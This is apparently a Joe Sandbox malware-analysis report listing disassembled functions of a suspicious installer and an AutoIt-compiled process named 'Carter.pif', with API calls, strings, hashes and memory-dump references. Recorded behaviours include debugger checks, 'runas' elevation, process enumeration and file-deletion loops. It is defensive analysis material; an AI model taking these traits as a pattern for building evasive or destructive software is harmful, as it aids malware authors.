Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: Carter.pifPID: 9172, Parent PID: 8972COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	101

Executed Functions

Function 00C05240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C0526C
IsDebuggerPresent.KERNEL32 ref: 00C0527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00C052E6

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

Part of subcall function 00BFBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BFBC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00C05366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C40B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00C40B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CA6D10), ref: 00C40BE9
ShellExecuteW.SHELL32(00000000), ref: 00C40BF0

Part of subcall function 00C0514C: GetSysColorBrush.USER32(0000000F), ref: 00C05156
Part of subcall function 00C0514C: LoadCursorW.USER32(00000000,00007F00), ref: 00C05165
Part of subcall function 00C0514C: LoadIconW.USER32(00000063), ref: 00C0517C
Part of subcall function 00C0514C: LoadIconW.USER32(000000A4), ref: 00C0518E
Part of subcall function 00C0514C: LoadIconW.USER32(000000A2), ref: 00C051A0
Part of subcall function 00C0514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C051C6
Part of subcall function 00C0514C: RegisterClassExW.USER32(?), ref: 00C0521C

Part of subcall function 00C050DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C05109
Part of subcall function 00C050DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C0512A
Part of subcall function 00C050DB: ShowWindow.USER32(00000000), ref: 00C0513E
Part of subcall function 00C050DB: ShowWindow.USER32(00000000), ref: 00C05147

Part of subcall function 00C059D3: _memset.LIBCMT ref: 00C059F9
Part of subcall function 00C059D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C05A9E

Strings

runas, xrefs: 00C40BE4
AutoIt, xrefs: 00C40B23
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C40B28

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 612e48302a456ef1e7e238a1b4582c1f4568168a309740def42ba17983df5ed8
Instruction ID: 80924a08675e75cac9c90de267c225cecbfcb9c4e39538c3b8cc513323c33044
Opcode Fuzzy Hash: 612e48302a456ef1e7e238a1b4582c1f4568168a309740def42ba17983df5ed8
Instruction Fuzzy Hash: 99510871948248EFCF11ABB0DC45FFEBB78EF55340F244269F951621E2CA704A49EB26

Function 00C53CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C02A58,?,00008000), ref: 00C102A4

Part of subcall function 00C54FEC: GetFileAttributesW.KERNEL32(?,00C53BFE), ref: 00C54FED

FindFirstFileW.KERNEL32(?,?), ref: 00C53D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C53E3E
MoveFileW.KERNEL32(?,?), ref: 00C53E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C53E6E
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C53E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C53EAC

Strings

\*.*, xrefs: 00C53D41, 00C53D4A, 00C53D5F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 199e6e2bfe94c19a74c4115988ec81c2d44756fde7821926049e0f74dde4be11
Instruction ID: 1c8d1231f301e6f1b8da434359aebdff8db347b5a90cc1006e0ad45eb46fe91f
Opcode Fuzzy Hash: 199e6e2bfe94c19a74c4115988ec81c2d44756fde7821926049e0f74dde4be11
Instruction Fuzzy Hash: 3151803580114DAECF15EBA0C9929EDB7B9AF11341F240165EC52B3092EF716F8DDB64

Function 00C05D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00C05D40

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

GetCurrentProcess.KERNEL32(?,00C80A18,00000000,00000000,?), ref: 00C05E07
IsWow64Process.KERNEL32(00000000), ref: 00C05E0E
GetNativeSystemInfo.KERNEL32(00000000), ref: 00C05E54
FreeLibrary.KERNEL32(00000000), ref: 00C05E5F
GetSystemInfo.KERNEL32(00000000), ref: 00C05E90
GetSystemInfo.KERNEL32(00000000), ref: 00C05E9C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 7e7d7835f3f66ff10735607c5c4ed973e724f1ac6a991b266c0da291c07c023e
Instruction ID: 0a0780f3d5623709c8092189192101633393e944a859685c339488d70634c678
Opcode Fuzzy Hash: 7e7d7835f3f66ff10735607c5c4ed973e724f1ac6a991b266c0da291c07c023e
Instruction Fuzzy Hash: FE91D431549BC4DFC731CB7884541ABFFE56F2A300B980A5ED0D793A81D234AA88DB69

Function 00C54005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C02A58,?,00008000), ref: 00C102A4

Part of subcall function 00C54FEC: GetFileAttributesW.KERNEL32(?,00C53BFE), ref: 00C54FED

FindFirstFileW.KERNEL32(?,?), ref: 00C5407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 00C540CC
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C540DD
FindClose.KERNEL32(00000000), ref: 00C540F4
FindClose.KERNEL32(00000000), ref: 00C540FD

Strings

\*.*, xrefs: 00C5404E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: be34be32950759e4040402129d05a06dfc4a3b34f7c9a3069c3977cb7a12d47e
Instruction ID: 918f9651774bfcc411f792e0fbfc04df6c8ccc7a6b1fdee5e6c969c50d5c2c99
Opcode Fuzzy Hash: be34be32950759e4040402129d05a06dfc4a3b34f7c9a3069c3977cb7a12d47e
Instruction Fuzzy Hash: 6C31A135008345AFC305EB60C8859AFB7E8BE91315F540A1DF8E1821D2DB20EA4DDB66

Function 00C54148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C5416D
Process32FirstW.KERNEL32(00000000,?), ref: 00C5417B
Process32NextW.KERNEL32(00000000,?), ref: 00C5419B
CloseHandle.KERNEL32(00000000), ref: 00C54245

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: db1ebc8d1ab65996537921660f7d117b2f405354f5f45cd2c36f382f282cd705
Instruction ID: af2a973f054555ddfeda33f61f9d0204c7891d8eeb3529a68bdcd537bf934ef2
Opcode Fuzzy Hash: db1ebc8d1ab65996537921660f7d117b2f405354f5f45cd2c36f382f282cd705
Instruction Fuzzy Hash: 8831C0711083419FD304EF50DC85BAFBBE8AF95315F54052DF992C21E1EB70AA89DB52

Function 00BFB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00C03740: CharUpperBuffW.USER32(?,00CB71DC,00000002,?,00000000,00CB71DC,?,00BF53A5,?,?,?,?), ref: 00C0375D

_memmove.LIBCMT ref: 00BFB68A

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: c27b67e7e0a4e4d2ba949b4efb0557adf29611b40b502389eefb6e6177830747
Instruction ID: eac40f3b86ef638a4963190ef02402b2a9fc081aa0aa89e5fc98f7352dcf9d6c
Opcode Fuzzy Hash: c27b67e7e0a4e4d2ba949b4efb0557adf29611b40b502389eefb6e6177830747
Instruction Fuzzy Hash: 2FA279746083459FD720DF14C480B2AB7E1FF88304F14899DEA9A8B362D775ED89CB92

Function 00C5494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00C3FC86), ref: 00C5495A
FindFirstFileW.KERNEL32(?,?), ref: 00C5496B
FindClose.KERNEL32(00000000), ref: 00C5497B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: f1878f361acb6c29344e1fe7b67feeefc4e7dd029c75ce1f0afc8df99a17c9e5
Instruction ID: 02cede967bb7d01e88275e1d7ac1ff7d0af2fcb0cf5812ded8d2915375ca56ee
Opcode Fuzzy Hash: f1878f361acb6c29344e1fe7b67feeefc4e7dd029c75ce1f0afc8df99a17c9e5
Instruction Fuzzy Hash: F5E0DF35810505AB83146738EC0EAEE775C9E0633AF200705F835C20E0EBB09ACC879E

Function 00BF94E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7b7c7be5ff69c0903cbc46207e67f2313c0613943b59d5e831e45558dbefba0
Instruction ID: de689a63e523cf3beca583ffaacd25b0442bf22468d21e2e5c722223ffc0b1bd
Opcode Fuzzy Hash: e7b7c7be5ff69c0903cbc46207e67f2313c0613943b59d5e831e45558dbefba0
Instruction Fuzzy Hash: 6A229974A0020A9FDB24DF54C480BBEB7F0FF49340F1481A9EA56AB341E774AD89DB91

Function 00BFBC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00BFBF57

Part of subcall function 00BF52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BF52E6

Sleep.KERNEL32(0000000A,?,?), ref: 00C336B5

Strings

CALL, xrefs: 00BFC277
@GUI_CTRLHANDLE, xrefs: 00C33816
@TRAY_ID, xrefs: 00C33FCD
@COM_EVENTOBJ, xrefs: 00C33D2E
@GUI_WINHANDLE, xrefs: 00C337C1
@GUI_CTRLID, xrefs: 00C3376C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: f5e4eaa02273fbd56188c61c88e2f1e24f10e12adc5079199b38d6fc071d5e5f
Instruction ID: 8ad6709184f938544aebcc82ee41971753d46cf61123080076d34b9c986e68c7
Opcode Fuzzy Hash: f5e4eaa02273fbd56188c61c88e2f1e24f10e12adc5079199b38d6fc071d5e5f
Instruction Fuzzy Hash: E9C29C70608345DFD728DF24C894BAABBE4FF84304F14495DF59A972A1CB71EA88DB42

Function 00BF33E6 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 70
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BF3444
RegisterClassExW.USER32(00000030), ref: 00BF346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF347F
InitCommonControlsEx.COMCTL32(?), ref: 00BF349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF34AC
LoadIconW.USER32(000000A9), ref: 00BF34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF34D1

Strings

+, xrefs: 00BF342D
TaskbarCreated, xrefs: 00BF3474
AutoIt v3 GUI, xrefs: 00BF3460
0, xrefs: 00BF3426

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: c01cc1665b438625d77528f5ee414a59b96b64ace4bcfb1cf0795dd4da0dbe82
Instruction ID: 2ef31527df2d1950762d0aa613fdfeb0e56fd0716013d95779985eb8b79a80ec
Opcode Fuzzy Hash: c01cc1665b438625d77528f5ee414a59b96b64ace4bcfb1cf0795dd4da0dbe82
Instruction Fuzzy Hash: D23118B1844309EFDB409FA4DC89BCDBBF4FB08310F20465AE990A62A0D7B91585CF95

Function 00BF3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BF3444
RegisterClassExW.USER32(00000030), ref: 00BF346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF347F
InitCommonControlsEx.COMCTL32(?), ref: 00BF349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF34AC
LoadIconW.USER32(000000A9), ref: 00BF34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF34D1

Strings

+, xrefs: 00BF342D
TaskbarCreated, xrefs: 00BF3474
AutoIt v3 GUI, xrefs: 00BF3460
0, xrefs: 00BF3426

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

